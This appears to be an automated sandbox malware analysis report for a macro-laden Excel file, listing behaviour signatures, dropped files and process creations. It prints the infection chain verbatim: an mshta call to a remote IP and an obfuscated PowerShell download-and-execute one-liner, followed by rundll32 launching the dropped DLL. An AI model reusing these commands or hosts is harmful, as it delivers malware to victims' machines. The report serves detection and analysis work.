Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00724EE3 12_2_00724EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00739EEC 12_2_00739EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073DEDC 12_2_0073DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072EE81 12_2_0072EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072CF47 12_2_0072CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00740F33 12_2_00740F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00727FF2 12_2_00727FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072DFF3 12_2_0072DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077907F 13_2_0077907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077A666 13_2_0077A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077AE6D 13_2_0077AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077044F 13_2_0077044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00769011 13_2_00769011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00770001 13_2_00770001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076F8FD 13_2_0076F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076AEFB 13_2_0076AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007664E2 13_2_007664E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077A2E8 13_2_0077A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076E2CC 13_2_0076E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007720BA 13_2_007720BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076EE81 13_2_0076EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076BB7E 13_2_0076BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00772550 13_2_00772550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00780F33 13_2_00780F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00766D24 13_2_00766D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00774116 13_2_00774116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00778519 13_2_00778519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00767FF2 13_2_00767FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076DFF3 13_2_0076DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00762BD9 13_2_00762BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00769DCF 13_2_00769DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007681B7 13_2_007681B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077E395 13_2_0077E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00765E60 13_2_00765E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00761A56 13_2_00761A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00770E53 13_2_00770E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00762051 13_2_00762051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00762251 13_2_00762251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00764C5D 13_2_00764C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00780056 13_2_00780056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00776C49 13_2_00776C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00767C37 13_2_00767C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077F435 13_2_0077F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00780E3A 13_2_00780E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077C631 13_2_0077C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077AA30 13_2_0077AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00763E3F 13_2_00763E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00763C3C 13_2_00763C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077AC3A 13_2_0077AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077BE27 13_2_0077BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00764816 13_2_00764816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00780C14 13_2_00780C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00778606 13_2_00778606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077DCF7 13_2_0077DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00764EE3 13_2_00764EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00779EEC 13_2_00779EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077DEDC 13_2_0077DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076D6D8 13_2_0076D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076B2C7 13_2_0076B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00775CC4 13_2_00775CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007766CA 13_2_007766CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007670B3 13_2_007670B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076F09B 13_2_0076F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076EA99 13_2_0076EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00771889 13_2_00771889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00765361 13_2_00765361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077176B 13_2_0077176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00768969 13_2_00768969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076A55F 13_2_0076A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077CB5B 13_2_0077CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00764346 13_2_00764346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076CF47 13_2_0076CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076B74D 13_2_0076B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077894B 13_2_0077894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00765548 13_2_00765548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00767735 13_2_00767735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077473C 13_2_0077473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00768B3D 13_2_00768B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077BB23 13_2_0077BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00769714 13_2_00769714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00770B19 13_2_00770B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007659F2 13_2_007659F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007795FA 13_2_007795FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00776DF8 13_2_00776DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00778BE3 13_2_00778BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077DBEA 13_2_0077DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00777DD5 13_2_00777DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00779BCF 13_2_00779BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076E5CF 13_2_0076E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007809B5 13_2_007809B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007651BB 13_2_007651BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00777BA6 13_2_00777BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007813AD 13_2_007813AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077C3A0 13_2_0077C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076E991 13_2_0076E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00774B87 13_2_00774B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0076AB87 13_2_0076AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00769B83 13_2_00769B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0077D389 13_2_0077D389
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 4885.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: opastonline.com.xls Macro extractor: Sheet name: LINKO
Source: opastonline.com.xls Macro extractor: Sheet name: LINKO
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Yara signature match
Source: opastonline.com.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\opastonline.com.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Diftwn\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: opastonline.com.xls OLE indicator, VBA macros: true
Source: opastonline.com.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@18/13@5/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: opastonline.com.xls OLE indicator, Workbook stream: true
Source: opastonline.com.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 10_2_100125C0
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K........T............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k..... ..............................}..v.... .......0.................T............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....................................}..v....X.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k......T.............................}..v............0...............H.T............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#..................k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#..................k....................................}..v............0.................T............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'...............z..k....E...............................}..v............0.................T............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+...............z..k....E...............................}..v............0.................T............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.................#.....:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE417.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00765988 CreateToolhelp32Snapshot, 13_2_00765988
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: 4885.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032200BF push 8B490264h; iretd 4_3_032200C5
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032208D0 push 8B490264h; iretd 4_3_032208D5
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032200BF push 8B490264h; iretd 4_3_032200C5
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032208D0 push 8B490264h; iretd 4_3_032208D5
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032200BF push 8B490264h; iretd 4_3_032200C5
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032208D0 push 8B490264h; iretd 4_3_032208D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10032B7D push ecx; ret 10_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10030DFF push ecx; ret 10_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10032B7D push ecx; ret 12_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10030DFF push ecx; ret 12_2_10030E12
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 10_2_1003D873
PE file contains an invalid checksum
Source: JooSee.dll.7.dr Static PE information: real checksum: 0x8df98 should be: 0x921ce

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Diftwn\pevlwp.arl (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Diftwn\pevlwp.arl (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Diftwn\pevlwp.arl:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100134F0 IsIconic, 10_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 10_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_100134F0 IsIconic, 12_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 12_2_10018C9A
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
